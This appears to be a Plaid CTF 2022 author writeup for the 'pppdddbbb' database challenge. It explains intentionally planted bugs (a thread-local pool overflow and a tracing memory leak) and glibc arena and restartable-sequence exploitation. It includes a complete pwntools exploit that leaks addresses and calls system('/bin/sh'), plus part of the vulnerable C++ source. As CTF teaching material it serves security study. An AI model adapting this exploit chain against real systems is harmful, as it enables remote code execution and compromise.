Skip to content

Instantly share code, notes, and snippets.

@rickyz

rickyz/README.md Secret

Last active May 11, 2022 04:27
Show Gist options
  • Save rickyz/54650a689586dec7d955ce6ecb03b0de to your computer and use it in GitHub Desktop.
Save rickyz/54650a689586dec7d955ce6ecb03b0de to your computer and use it in GitHub Desktop.
pppdddbbb writeup

pppdddbbb writeup (Plaid CTF 2022)

Summary

pppdddbbb is a 400pt pwnable in Plaid CTF 2022. Players are given the C++ source code and binary for a toy database program (as well as a Dockerfile allowing players to reproduce the CTF environment locally).

High level details:

  • pppdddbbb implements a multi-versioned key-value store. The database can be viewed as a map from keys to a list of versions representing the history of the key's value. Versions in the history are identified by a sequence number assigned to the transaction which added the version. Deletions are represented by a special tombstone value.
  • Data is stored in a log structured merge tree. The database maintains a "stack" of layers, where incoming writes are always applied to the top-most layer (aka the "mutable" layer). It is possible to "seal" the mutable layer for new writes and create a new, empty mutable layer (which the code calls a "minor compaction"). Sealed layers can be merged together (called a "merge compaction"). When merging layers, the compaction may also discard deleted versions whose sequence numbers have fallen below a user-settable GC watermark sequence number.
  • The database supports multi-key transactions. Transactions acquire locks before attempting to read or write any key. Transactional reads and writes block on locks via a mutex/condition variable. This database doesn't implement any sort of deadlock prevention scheme.

Low level details:

  • The program implements a simple RPC system that multiplexes (potentially concurrently executing) RPCs over a single TCP stream. RPC requests are read off of the TCP stream from a single thread, and then processed on separate handler threads. A new thread is created for each incoming RPC.
  • Keys are always strings, but values can be of various types: null, string, u32, u64, Vec2, Vec3, and Quaternion.
  • Within each layer, string keys/values are backed by a simple arena allocator.
  • Each Layer owns Version objects, which are heap-allocated. When a layer is destroyed, its Versions aren't freed immediately. Instead, they are appended to a free list (Pool<Version>::items_) in the thread-local storage of the thread that is destroying the layer.

(Intended) Bugs

Pool buffer overflow

There is no bound checking when objects are appended to the Pool free list:

template <typename T>
class Pool {
  ...
  void Release(T* obj) { items_[size_++] = obj; }
  ...
  static thread_local Pool<T> pool_;
  static constexpr size_t kMaxSize = 256;
  ...
  size_t size_ = 0;
  T* items_[kMaxSize] = {nullptr};
  ...
}

Appending more than kMaxSize = 256 objects to a pool's free list will write object pointers out of bounds. There is only one type of Pool in the program (Pool<Version>). The pool is located in thread local storage, immediately before the thread descriptor (struct pthread):

+------------------------+------------------------+------------------+
|  ... thread stack ...  |  Pool<Version>::pool_  |  struct pthread  |  <-- top of thread stack
+------------------------+------------------------+------------------+

In summary, this bug allows us to overwrite fields of struct pthread with pointers to Version objects.

Memory disclosure in debug tracing

The program comes with debug tracing functionality which logs information about its operations into a trace buffer which can be read back by the client. The tracing in the Read RPC attempts to pretty-print the value that was read. This pretty-printing incorrectly assumes that string values are null-terminated strings:

std::string DebugString(const Value& value) {
  return std::visit(
      overloaded{
          ...
          [](std::string_view v) { return StrFormat("\"%s\"", v.data()); },
          ...
      },
      value);
}

This can be abused to leak uninitialized memory from a layer's arena, where string values are stored.

Exploitation

Leaking addresses

The exploit starts with leaking libc, binary, and heap addresses using the memory disclosure bug. The general strategy will be to:

  1. Allocate and free some Transaction objects.
  2. Get a Layer arena block to be allocated over the freed Transaction objects.
  3. Write a non-null-terminated value into the layer so that an address appears immediately after the value, then read back the value with debug tracing enabled. This should leak the address into the debug trace.

This should give us all of the addresses we need:

  • A libc address via next/prev pointers in heap metadata pointing into main_arena in libc's .data section.
  • A binary base address via Transaction::table_ pointing into the binary's .data section.
  • A heap address via either pointers in Transaction or heap metadata.

This mostly works, except for one detail - the program makes heavy use of threads, so most allocations will happen on separate per-thread arenas and not main_arena. These other arenas are mmapped (as opposed to main_arena, which lives in glibc's .data section). Our technique for leaking pointers into an arena will only give us a libc address if the arena is main_arena.

Our exploit works around this by forcing allocations to happen on a thread which reuses main_arena. Doing so requires understanding how glibc malloc assigns arenas to threads:

  • When possible, glibc wants to avoid assigning the same arena to multiple threads, as those threads may contend on the arena lock.
  • However, glibc is also unwilling to create too many arenas beyond some limit. The default limit on x86-64 is num_cores * 8. The problem explicitly sets the limit to 8 (mallopt(M_ARENA_MAX, 8)) so that players don't need to figure out the number of cores on the challenge server.
  • The first time a thread performs an allocation, it obtains an arena as follows:
    1. Check a free list of arenas that are in use by 0 threads. If it is not empty, remove an entry from the free list and return it.
    2. If the number of arenas is below the limit, create a new arena and return it.
    3. Otherwise, reuse an arena that may already be in use by another thread. This function round-robins across all currently in-use arenas.
  • On thread shutdown, if the thread is the only user of its malloc arena, then the arena is returned to the arena free list.

With this understanding, we can force main_arena to be reused as follows:

  1. Start MAX_ARENAS - 1 threads. On each thread, perform some allocation, then block (so that its arena is not returned to the arena free list). This causes the process to have MAX_ARENAS arenas (including main_arena).
  2. Every time we want to allocate something on main_arena, we ensure that main_arena is the next arena in the round-robin sequence (next_to_use in reused_arena). We can arrange for this happen by performing dummy requests as needed to advance next_to_use.

Our exploit accomplishes (1) by starting a transaction that locks a database key, then starting MAX_ARENAS - 1 new transactions that all try to the read the locked key. Those threads will now block waiting on the transactional lock.

With this, we are able to leak libc, binary, and heap addresses using the same methods as in a singled-threaded program.

Getting code execution

The intended solution makes use of a relatively new feature added in glibc 2.35: restartable sequences support.

The intent was for players to reason that the TLS overwrite must overwrite the stack canary, so the exploit has to gain code execution before returning from any function with a stack canary. The hope was that this would eliminate most of the overwrite targets in struct pthread aside from the intended one.

Restartable sequences background

Most developers are familiar with thread-local data and how they can avoid the need for locking - however, sometimes we'd prefer to maintain an object per-CPU rather than per-thread. Use cases for per-CPU objects include things like allocator free lists and cheap stats counters. Restartable sequences provide a mechanism for the kernel to inform a task if it has been preempted within a particular critical section of code. Specifically, before entering a critical section, a userspace thread writes a pointer to this structure to a memory location (inside rseq_area in struct pthread) that has been preregistered with the kernel in advance:

struct rseq_cs {
  uint32_t version;
  uint32_t flags;
  uint64_t start_ip;
  uint64_t post_commit_offset;
  uint64_t abort_ip;
};

When returning to userspace, the kernel will examine this structure. If it has interrupted the thread while it was executing an instruction in [start_ip, start_ip + post_commit_offset), then the kernel will change the instruction pointer to abort_ip.

This is pretty exciting from an exploiter's perspective, as it adds a potential control flow edge from anywhere in the program (even an infinite loop) to this abort_ip. However, the designers of this API were aware of the dangers of allowing jumps to arbitrary instructions, so they added the following restriction:

When a program registers a thread for restartable sequences (via the rseq system call), it provides a 32-bit "signature" value. The kernel will only jump to abort_ip addresses if the 32-bit value at abort_ip - 4 matches this signature.

On x86-64, glibc uses a signature of 0x53053053.

This severely limits the number of targets that we can redirect control to. Luckily, one of the targets still ends up working out! (Author note: during the initial brainstorming for this problem, I was even considering adding a JIT to make it possible to introduce additional abort targets.)

Restartable sequences gadget

The libc version in question contains only one occurrence of the signature value - it shows up in thread startup code, where a thread registers with the kernel to enable restartable sequences:

   94aed:       41 ba 53 30 05 53       mov    r10d,0x53053053  # RSEQ_SIG
   94af3:       31 d2                   xor    edx,edx          # <-- valid abort_ip
   94af5:       be 20 00 00 00          mov    esi,0x20
   94afa:       48 8d b8 a0 09 00 00    lea    rdi,[rax+0x9a0]
   94b01:       b8 4e 01 00 00          mov    eax,0x14e
   94b06:       0f 05                   syscall
   ...

This happens inside of start_thread. The above assembly comes from rseq_register_current_thread which has been inlined into this function:

start_thread (void *arg)
{
  ...
  {
    bool do_rseq = THREAD_GETMEM (pd, flags) & ATTR_FLAG_DO_RSEQ;
    if (!rseq_register_current_thread (pd, do_rseq) && do_rseq)
      __libc_fatal ("Fatal glibc error: rseq registration failed\n");
  }
  ...
        ret = pd->start_routine (pd->arg);
  ...
}

Walking further past the end of the above assembly snippet, we find that as long as do_rseq is false (r8d is 0), pd (a struct pthread*) will be loaded from [rsp+8], and the code will call a function pointer/argument loaded from pd.

Putting it all together

We now have all of the addresses we need and a single gadget that we can use as the abort_ip for our rseq_cs pointer overwrite. At this point, it makes sense to think about what context we would like to trigger restartable sequence abort from. Here are the requirements:

  1. It must be from the thread where we triggered the version pool overflow, since we are only able to overwrite the rseq_cs pointer for that thread.
  2. We need r8d = 0 and [rsp+8] to point to a fake struct pthread we control.
  3. r8d and rsp should be stable in the "critical section" we register - otherwise, the exploit would crash if the thread was preempted at an inconvenient time.

This is where the (unfortunately super contrived) CopyHandler::Backdoor() function comes in. This function is written to meet all of the above requirements - it gives us r8 = 0, lets us control [rsp+8], and then enters an infinite spinloop where both r8 and rsp are stable. That spin loop will be our restartable sequences "critical section." (Author note: I was originally hoping to find a more natural/sneaky way to introduce these conditions, but I ran out of development time before the CTF :-/)

All that remains is to trigger the TLS overflow bug immediately before a call to CopyHandler::Backdoor(). Specifically, we want to ensure that CopyHandler ends up releasing the last reference to a Layer. Once again, we make use of transactional locks to block and unblock threads. CopyHandler performs a transaction which reads a value for a key, then writes that value into another key. The value that CopyHandler reads holds a reference to the Layer that the value came from. We can keep that reference alive across a merge compaction as follows:

  1. Start a transaction T, and have it take a lock on key 'b'
  2. Start a copy RPC copying from 'a' to 'b'. The copy will read 'a' (and grab a reference to the value's Layer) then block waiting on acquiring a lock for 'b'.
  3. Perform a merge compaction that discards the aforementioned layer. Now the copy RPC holds the single reference to this layer.

Our exploit sets up the layer in question so that it has enough versions to overflow the Version pool and overwrite the thread's rseq_cs pointer. The rseq_cs will be overwritten with a Version containing a Quarternion we control that will be interpreted as a struct rseq_cs.

At this point, we can abort the transaction T and release its locks. This unblocks the copy RPC, which releases the last Layer reference, and destroys it, triggering the TLS overflow. The thread then enters an infinite loop with r8d = 0 and [rsp+8] pointing to a fake struct pthread with start_routine = system and arg = "/bin/sh". When the kernel preempts this thread, it sees the rseq_cs we have installed and sets rip to our restartable sequences gadget, which calls system("/bin/sh") and gives us a shell.

Conclusion

Problems with this much code can be a lot of work to write and solve, but I like the idea of challenges that have a greater amount of functionality, and provide exploit primitives that can be combined/sequenced in many different ways (e.g. thread blocking and reference manipulation in this challenge).

Thank you for making it all the way here! Even if nobody ended up solving this during the CTF (or the week after), I hope it was a fun challenge to play, or at least to read the writeup for!

Obligatory flag:

$ ./exploit.py
[+] Opening connection to pppdddbbb.chal.pwni.ng on port 1337: Done
[*] libc_base = 0x7fa21ab07000
[*] binary_base = 0x55733c66b000
[*] block_addr = 0x55733c96fc90
[+] Writing overflow versions: Done
[*] Switching to interactive mode
\x03\x00\x00\x00\x00$
$ cat flag.txt
PCTF{TLS_in_yoTLS_in_your_LSM}
#!/usr/bin/env python
from pwn import *
from dataclasses import dataclass
from enum import Enum
from functools import wraps
from typing import Any, Union, Optional
context.update(arch='amd64', os='linux')
class Command(Enum):
READ = 0
BEGIN_TRANSACTION = 1
BUFFER_MUTATION = 2
COMMIT = 3
ABORT = 4
MINOR_COMPACT = 5
MERGE_COMPACT = 6
SET_GC_WATERMARK = 7
SET_TRACE_ENABLED = 8
FLUSH_TRACE = 9
COPY = 10
class ValueTag(Enum):
NULL = 0
STRING = 1
U32 = 2
U64 = 3
VEC2 = 4
VEC3 = 5
QUATERNION = 6
@dataclass
class Value:
tag: ValueTag
value: Any = None
INVALID_TID = 0
MAX_SEQUENCE_NUMBER = (1 << 64) - 1
def p1(b):
return bytes([b])
@dataclass
class RequestState:
command: Command
response: Any = None
@dataclass
class ReadResponse:
error: bytes
value: Optional[Any] = None
@dataclass
class BeginTransactiondResponse:
tid: int
@dataclass
class BufferMutationResponse:
error: bytes
@dataclass
class CommitResponse:
error: bytes
seq: int
@dataclass
class AbortResponse:
error: bytes
@dataclass
class MinorCompactResponse:
new_mutable_layer_id: int
@dataclass
class SetGcWatermarkResponse:
error: bytes
@dataclass
class FlushTraceResponse:
trace: bytes
@dataclass
class CopyResponse:
error: bytes
@dataclass
class EmptyResponse:
pass
DO_SLEEP = False
# Wrapper for client RPC methods allowing them to be run either
# synchronously or asynchronously.
def maybe_sync(f):
@wraps(f)
def wrapper(*args, **kwargs):
sync = kwargs.pop('sync', True)
rid = f(*args, **kwargs)
if DO_SLEEP:
# Sleep to give the request handler thread time to finish before
# sending the next call. This was useful during local exploit
# development, but it wasn't needed in practice when exploiting
# over the network.
sleep(0.1)
if sync:
return args[0].wait_for_response(rid)
return rid
return wrapper
class Client(object):
def __init__(self, conn):
self.conn = conn
self.next_request_id = 0
self.requests = {}
magic = self.conn.recvn(16)
MAGIC = b'PPPDDDBBB_1.0'.ljust(16, b'\0')
assert magic == MAGIC, magic
def _get_request_id(self, request_type):
rid = self.next_request_id
self.next_request_id += 1
self.requests[rid] = RequestState(request_type)
return rid
def _marshal_string(self, b):
return p16(len(b)) + b
def _read_u16(self):
return u16(self.conn.recvn(2))
def _read_u32(self):
return u32(self.conn.recvn(4))
def _read_u64(self):
return u64(self.conn.recvn(8))
def _read_string(self):
size = self._read_u16()
return self.conn.recvn(size)
def _request_header(self, command):
rid = self._get_request_id(command)
return rid, p1(command.value) + p64(rid)
def _read_value(self):
tag = self.conn.recvn(1)[0]
if tag == ValueTag.NULL.value:
value = None
elif tag == ValueTag.STRING.value:
value = self._read_string()
elif tag == ValueTag.U32.value:
value = self._read_u32()
elif tag == ValueTag.U64.value:
value = self._read_u64()
elif tag == ValueTag.VEC2.value:
value = (self._read_u64(), self._read_u64())
elif tag == ValueTag.VEC3.value:
value = (self._read_u64(), self._read_u64(), self._read_u64())
elif tag == ValueTag.QUATERNION.value:
value = (self._read_u64(), self._read_u64(), self._read_u64(), self._read_u64())
else:
raise 'Invalid value'
return Value(ValueTag(tag), value)
def _read_response(self):
rid = self._read_u64()
assert rid in self.requests, rid
request_state = self.requests[rid]
if request_state.command == Command.READ:
error = self._read_string()
value = self._read_value()
request_state.response = ReadResponse(error, value)
elif request_state.command == Command.BEGIN_TRANSACTION:
tid = self._read_u64()
request_state.response = BeginTransactiondResponse(tid)
elif request_state.command == Command.BUFFER_MUTATION:
error = self._read_string()
request_state.response = BufferMutationResponse(error)
elif request_state.command == Command.COMMIT:
error = self._read_string()
seq = self._read_u64()
request_state.response = CommitResponse(error, seq)
elif request_state.command == Command.ABORT:
error = self._read_string()
request_state.response = AbortResponse(error)
elif request_state.command == Command.MINOR_COMPACT:
new_mutable_layer_id = self._read_u64()
request_state.response = MinorCompactResponse(new_mutable_layer_id)
elif request_state.command == Command.MERGE_COMPACT:
request_state.response = EmptyResponse()
elif request_state.command == Command.SET_GC_WATERMARK:
error = self._read_string()
request_state.response = SetGcWatermarkResponse(error)
elif request_state.command == Command.SET_TRACE_ENABLED:
request_state.response = EmptyResponse()
elif request_state.command == Command.FLUSH_TRACE:
trace = self._read_string()
request_state.response = FlushTraceResponse(trace)
elif request_state.command == Command.COPY:
error = self._read_string()
request_state.response = CopyResponse(error)
else:
raise 'Invalid command'
def wait_for_response(self, rid):
assert rid in self.requests, rid
request_state = self.requests[rid]
while request_state.response is None:
self._read_response()
return request_state.response
@maybe_sync
def read(self, key, seq=MAX_SEQUENCE_NUMBER, tid=INVALID_TID):
rid, data = self._request_header(Command.READ)
data += p64(tid)
data += p64(seq)
data += self._marshal_string(key)
self.conn.send(data)
return rid
@maybe_sync
def begin_transaction(self):
rid, data = self._request_header(Command.BEGIN_TRANSACTION)
self.conn.send(data)
return rid
@maybe_sync
def buffer_mutation(self, tid, key, value):
rid, data = self._request_header(Command.BUFFER_MUTATION)
data += p64(tid)
data += self._marshal_string(key)
data += p1(value.tag.value)
if value.tag == ValueTag.NULL:
pass
elif value.tag == ValueTag.STRING:
data += self._marshal_string(value.value)
elif value.tag == ValueTag.U32:
data += p32(value.value)
elif value.tag == ValueTag.U64:
data += p64(value.value)
elif value.tag == ValueTag.VEC2 or value.tag == ValueTag.VEC3 or value.tag == ValueTag.QUATERNION:
for e in value.value:
data += p64(e)
else:
raise 'Unsupported value type'
self.conn.send(data)
return rid
@maybe_sync
def commit(self, tid):
rid, data = self._request_header(Command.COMMIT)
data += p64(tid)
self.conn.send(data)
return rid
@maybe_sync
def abort(self, tid):
rid, data = self._request_header(Command.ABORT)
data += p64(tid)
self.conn.send(data)
return rid
@maybe_sync
def minor_compact(self):
rid, data = self._request_header(Command.MINOR_COMPACT)
self.conn.send(data)
return rid
@maybe_sync
def merge_compact(self, start, limit):
rid, data = self._request_header(Command.MERGE_COMPACT)
data += p64(start)
data += p64(limit)
self.conn.send(data)
return rid
@maybe_sync
def set_gc_watermark(self, gc_watermark):
rid, data = self._request_header(Command.SET_GC_WATERMARK)
data += p64(gc_watermark)
self.conn.send(data)
return rid
@maybe_sync
def set_trace_enabled(self, enabled):
rid, data = self._request_header(Command.SET_TRACE_ENABLED)
data += p1(enabled)
self.conn.send(data)
return rid
@maybe_sync
def flush_trace(self):
rid, data = self._request_header(Command.FLUSH_TRACE)
self.conn.send(data)
return rid
@maybe_sync
def copy(self, a, b, c):
rid, data = self._request_header(Command.COPY)
data += self._marshal_string(a)
data += self._marshal_string(b)
data += self._marshal_string(c)
self.conn.send(data)
return rid
def check_ok(response):
if hasattr(response, 'error'):
assert len(response.error) == 0, response.error
return response
conn = remote('pppdddbbb.chal.pwni.ng', 1337)
c = Client(conn)
blocker = c.begin_transaction().tid
check_ok(c.read(b'conflict', tid=blocker))
MAX_ARENAS = 8
# Exhaust arenas by starting a bunch of blocked threads. The threads
# will be blocked waiting on a lock on 'conflict'.
blocked_tids = []
for _ in range(MAX_ARENAS - 1):
blocked_tids.append(c.begin_transaction().tid)
# Ensure reads allocate (so that an arena is assigned to their threads).
c.set_trace_enabled(True)
for blocked_tid in blocked_tids:
c.read(b'conflict', tid=blocked_tid, sync=False)
# Uses first arena after main_arena.
c.set_trace_enabled(False)
insert_tid = c.begin_transaction().tid
key = b'k' * 7
check_ok(c.buffer_mutation(insert_tid, key, Value(ValueTag.STRING, b'v' * 7)))
for _ in range(MAX_ARENAS - 4):
c.set_trace_enabled(False)
# Allocate the Transaction objects for t1 and t2 on main_arena.
t1 = c.begin_transaction().tid
for _ in range(MAX_ARENAS - 1):
c.set_trace_enabled(False)
t2 = c.begin_transaction().tid
for _ in range(MAX_ARENAS - 1):
c.set_trace_enabled(False)
t3 = c.begin_transaction().tid
check_ok(c.abort(t2))
check_ok(c.abort(t1))
check_ok(c.abort(t3))
for _ in range(MAX_ARENAS - 4):
c.set_trace_enabled(False)
# Allocate the block for insert_tid's key/value on main_arena.
check_ok(c.commit(insert_tid))
def write_str(key, value):
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.STRING, value)))
check_ok(c.commit(tid))
# Reads the given key using the tracing functionality, which can leak
# memory because it incorrectly assumes that keys/values are
# null-terminated.
def trace_read(key):
c.set_trace_enabled(True)
check_ok(c.read(key))
trace = c.flush_trace().trace
c.set_trace_enabled(False)
return trace.split(b' -> "', 1)[1].rsplit(b'"', 1)[0]
write_str(key, b'v' * 0xd0)
leak = trace_read(key)
main_arena_addr = u64(leak[-6:] + b'\0\0')
libc_base = main_arena_addr - 0x219da0
log.info(f'libc_base = {hex(libc_base)}')
write_str(key, b'v' * 0x1f)
leak = trace_read(key)
table_addr = u64(leak[-6:] + b'\0\0')
binary_base = table_addr - 0x13018
log.info(f'binary_base = {hex(binary_base)}')
write_str(key, b'v' * 0x7)
leak = trace_read(key)
heap_addr = u64(leak[-6:] + b'\0\0')
#block_addr = heap_addr - 0xc8
block_addr = heap_addr - 0x110
log.info(f'block_addr = {hex(block_addr)}')
# Points to the instruction after `mov r10d, 0x53053053` in
# `start_thread()`. Requires: r8 = 0 and [rsp+8] is a pointer to a fake
# `struct pthread`. If these conditions are satisfied, it will call
# `fake_pthread->start_routine(fake_pthread->arg)`.
rseq_gadget = libc_base + 0x94af3;
system = libc_base + 0x50d60
binsh = libc_base + 0x1d8698
payload = b''
payload += p64(system)
payload += p64(binsh)
write_str(b'AAAAAA', payload)
fake_thread_func_addr = block_addr + 0x110
DO_SLEEP = False
# Clean up blocked transactions/values from the leaking step.
check_ok(c.abort(blocker))
rids = []
for blocked_tid in blocked_tids:
rids.append(c.abort(blocked_tid, sync=False))
for rid in rids:
check_ok(c.wait_for_response(rid))
tid = c.begin_transaction().tid
for key in [b'key', b'conflict']:
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
delete_seq = check_ok(c.commit(tid)).seq
layer_id = c.minor_compact().new_mutable_layer_id
check_ok(c.set_gc_watermark(delete_seq))
c.merge_compact(0, layer_id)
loop_start = binary_base + 0xd99b
loop_end = binary_base + 0xda01
key = b'k'
# This quaternion will be interpreted as a `struct rseq_cs`.
quat = (
0, # version, flags
loop_start, # start_ip,
loop_end - loop_start, # post_commit_offset
rseq_gadget, # abort_ip
)
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.QUATERNION, quat)))
seq = check_ok(c.commit(tid)).seq
# Insert and delete a bunch of values so that when this layer is
# destroyed, a pointer to the above quaternion will be written over
# `rseq_area.rseq_cs.ptr` in `struct pthread`.
POOL_MAX_SIZE = 256
RSEQ_PTR_OFFSET = 2472
with log.progress('Writing overflow versions') as p:
num_values = POOL_MAX_SIZE + RSEQ_PTR_OFFSET // 8 - 1
for i in range(num_values):
p.status(f'{i} / {num_values}')
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
check_ok(c.commit(tid))
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
delete_seq = check_ok(c.commit(tid)).seq
layer_id = c.minor_compact().new_mutable_layer_id
check_ok(c.set_gc_watermark(delete_seq))
write_str(b'a', b'value')
# If we were to merge compact [0, layer_id) now, then layer destruction
# (and thus the TLS overwrite) would happen on the merge compaction
# thread. The program would crash before returning from `Compact()`, as
# the TLS overwrite has overwritten the stack canary in TLS. Prevent
# this from happening by starting a copy RPC whose transaction commit is
# blocked on a lock. The blocked copy RPC will keep a reference to the
# layer via the `ReadResult` from the read it perform.
blocker = c.begin_transaction().tid
check_ok(c.read(b'b', tid=blocker))
stack = b''
stack += p64(0)
stack += p64(fake_thread_func_addr - 200 * 8)
c.copy(b'a', b'b', stack, sync=False)
c.merge_compact(0, layer_id)
# Unblock the copy RPC. Now, the copy RPC will enter the "backdoor"
# function, which meets the conditions for gaining RIP control via
# `rseq_gadget`.
check_ok(c.abort(blocker, sync=False))
conn.interactive(prompt='$ ')
#include <emmintrin.h>
#include <fcntl.h>
#include <inttypes.h>
#include <malloc.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <algorithm>
#include <atomic>
#include <condition_variable>
#include <functional>
#include <limits>
#include <list>
#include <map>
#include <memory>
#include <mutex>
#include <optional>
#include <set>
#include <shared_mutex>
#include <span>
#include <string>
#include <string_view>
#include <thread>
#include <tuple>
#include <variant>
#include <vector>
#define CHECK(condition) \
do { \
if (!(condition)) { \
CheckFailure("Check failed at %s:%d: %s\n", __FILE__, __LINE__, \
#condition); \
} \
} while (0);
#define PCHECK(condition) \
do { \
if (!(condition)) { \
CheckFailure("Check failed at %s:%d (%m): %s\n", __FILE__, __LINE__, \
#condition); \
} \
} while (0);
void CheckFailure(const char* format, ...) {
// asm("int3");
va_list ap;
va_start(ap, format);
vfprintf(stderr, format, ap);
va_end(ap);
abort();
}
template <typename Fn, typename... Args>
auto HandleEINTR(Fn fn, Args... args) -> decltype(fn(args...)) {
decltype(fn(args...)) result;
errno = 0;
do {
result = fn(args...);
} while (result == -1 && errno == EINTR);
return result;
}
ssize_t ReadLen(int fd, void* buf, size_t n) {
uint8_t* ptr = reinterpret_cast<uint8_t*>(buf);
ssize_t nread = 0;
while (nread < n) {
const ssize_t rc = HandleEINTR(read, fd, ptr + nread, n - nread);
if (rc < 0) {
return rc;
}
if (rc == 0) {
break;
}
nread += rc;
}
return nread;
}
ssize_t WriteLen(int fd, const void* buf, size_t n) {
const uint8_t* ptr = reinterpret_cast<const uint8_t*>(buf);
ssize_t nwritten = 0;
while (nwritten < n) {
const ssize_t rc = HandleEINTR(write, fd, ptr + nwritten, n - nwritten);
if (rc < 0) {
return rc;
}
nwritten += rc;
}
return nwritten;
}
using SequenceNumber = uint64_t;
constexpr SequenceNumber kMaxSequenceNumber =
std::numeric_limits<SequenceNumber>::max();
template <typename T>
class Pool {
public:
class Deleter {
public:
void operator()(T* obj) const { pool_.Release(obj); }
};
static Pool<T>& Get() { return pool_; }
using Ptr = std::unique_ptr<T, Deleter>;
Ptr Allocate() {
if (size_ > 0) {
CHECK(size_ < kMaxSize);
--size_;
T* obj = items_[size_];
CHECK(obj != nullptr);
return Ptr(obj, Deleter());
}
return Ptr(new T, Deleter());
}
private:
void Release(T* obj) { items_[size_++] = obj; }
static thread_local Pool<T> pool_;
static constexpr size_t kMaxSize = 256;
size_t size_ = 0;
T* items_[kMaxSize] = {nullptr};
};
struct Vec2 {
double x;
double y;
};
struct Vec3 {
double x;
double y;
double z;
};
struct Quaternion {
double a;
double b;
double c;
double d;
};
template <class... Ts>
struct overloaded : Ts... {
using Ts::operator()...;
};
template <class... Ts>
overloaded(Ts...) -> overloaded<Ts...>;
using Value = std::variant<std::monostate, std::string_view, uint32_t, uint64_t,
Vec2, Vec3, Quaternion>;
using OwnedValue = std::variant<std::monostate, std::string, uint32_t, uint64_t,
Vec2, Vec3, Quaternion>;
OwnedValue ToOwned(const Value& value) {
return std::visit(overloaded{[](std::string_view v) -> OwnedValue {
return std::string(v);
},
[](const auto& v) -> OwnedValue { return v; }},
value);
}
Value ToUnowned(const OwnedValue& value) {
return std::visit(overloaded{[](const auto& v) -> Value { return v; }},
value);
}
std::string VStrFormat(const char* format, va_list ap) {
char* buf = nullptr;
CHECK(vasprintf(&buf, format, ap) != -1);
std::unique_ptr<char, decltype(free)*> deleter(buf, free);
return std::string(buf);
}
std::string StrFormat(const char* format, ...) {
va_list ap;
va_start(ap, format);
std::string result = VStrFormat(format, ap);
va_end(ap);
return result;
}
std::string DebugString(const Value& value) {
return std::visit(
overloaded{
[](std::monostate) -> std::string { return "(null)"; },
[](std::string_view v) { return StrFormat("\"%s\"", v.data()); },
[](uint32_t v) { return StrFormat("u32(%" PRIu32 ")", v); },
[](uint64_t v) { return StrFormat("u64(%" PRIu64 ")", v); },
[](const Vec2 v) { return StrFormat("Vec2(%g, %g)", v.x, v.y); },
[](const Vec3 v) {
return StrFormat("Vec2(%g, %g, %g)", v.x, v.y, v.z);
},
[](const Quaternion v) {
return StrFormat("Quaternion(%g, %g, %g, %g)", v.a, v.b, v.c, v.d);
},
},
value);
}
struct Version {
Value value;
SequenceNumber seq = 0;
};
template <typename T>
thread_local Pool<T> Pool<T>::pool_;
using VersionPtr = Pool<Version>::Ptr;
using VersionList = std::vector<VersionPtr>;
class Arena {
public:
char* Allocate(size_t n) {
char* ptr = nullptr;
if (n > kDefaultBlockSize) {
blocks_.emplace_back(n);
ptr = blocks_.back().Allocate(n);
CHECK(ptr != nullptr);
return ptr;
}
if (!blocks_.empty()) {
ptr = blocks_.front().Allocate(n);
if (ptr != nullptr) {
return ptr;
}
}
blocks_.emplace_front(kDefaultBlockSize);
ptr = blocks_.front().Allocate(n);
CHECK(ptr != nullptr);
return ptr;
}
private:
static constexpr size_t kDefaultBlockSize = 4096;
class Block {
public:
explicit Block(size_t size)
: data_(new char[size]), ptr_(data_.get()), remaining_(size) {}
Block(Block&&) = default;
Block& operator=(Block&&) = default;
char* Allocate(size_t n) {
if (remaining_ < n) {
return nullptr;
}
char* ptr = ptr_;
ptr_ += n;
remaining_ -= n;
return ptr;
}
private:
std::unique_ptr<char[]> data_;
char* ptr_;
size_t remaining_;
};
std::list<Block> blocks_;
};
class Layer {
public:
using Id = uint64_t;
explicit Layer(Id id) : id_(id) {}
void Set(std::string_view key, Value value, SequenceNumber seq) {
std::unique_lock l(mu_);
CHECK(!sealed_);
VersionList* version_list;
auto it = map_.find(key);
if (it != map_.end()) {
version_list = &it->second;
} else {
version_list = &map_[ArenaString(key)];
}
auto version = Pool<Version>::Get().Allocate();
version->seq = seq;
version->value = std::visit(
overloaded{
[&](std::string_view v) -> Value { return ArenaString(v); },
[](const auto& v) -> Value { return v; },
},
value);
version_list->push_back(std::move(version));
}
const Version* Read(std::string_view key, SequenceNumber seq) {
std::shared_lock l(mu_);
const auto it = map_.find(key);
if (it == map_.end()) {
return nullptr;
}
const auto& versions = it->second;
auto version_it =
std::upper_bound(versions.begin(), versions.end(), seq,
[](SequenceNumber seq, const VersionPtr& version) {
return seq < version->seq;
});
if (version_it == versions.begin()) {
return nullptr;
}
--version_it;
return version_it->get();
}
using Iterator = std::map<std::string_view, VersionList>::const_iterator;
Iterator begin() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.cbegin();
}
Iterator end() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.cend();
}
bool empty() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.empty();
}
void Seal() {
std::unique_lock l(mu_);
CHECK(!sealed_);
sealed_ = true;
}
Id id() const { return id_; }
private:
std::string_view ArenaString(std::string_view str) {
char* ptr = arena_.Allocate(str.size() + 1);
memcpy(ptr, str.data(), str.size());
return std::string_view(ptr, str.size());
}
const Id id_;
mutable std::shared_mutex mu_;
bool sealed_ = false;
Arena arena_;
std::map<std::string_view, VersionList> map_;
};
class LayerStack {
public:
LayerStack() {}
~LayerStack() {}
void AddLayer(std::shared_ptr<Layer> layer) {
layers_.push_back(std::move(layer));
}
const Version* Read(std::string_view key, SequenceNumber seq) {
const Version* result = nullptr;
for (const auto& layer : layers_) {
const Version* version = layer->Read(key, seq);
if (version == nullptr) {
continue;
}
if (version->seq > seq) {
break;
}
result = std::move(version);
}
return result;
}
void Iterate(const std::function<void(
std::string_view, std::span<const Version*> versions)>& fn) {
std::vector<Layer::Iterator> iterators;
std::vector<size_t> min_heap;
for (size_t i = 0; i < layers_.size(); ++i) {
const auto& layer = *layers_[i];
if (layer.begin() == layer.end()) {
continue;
}
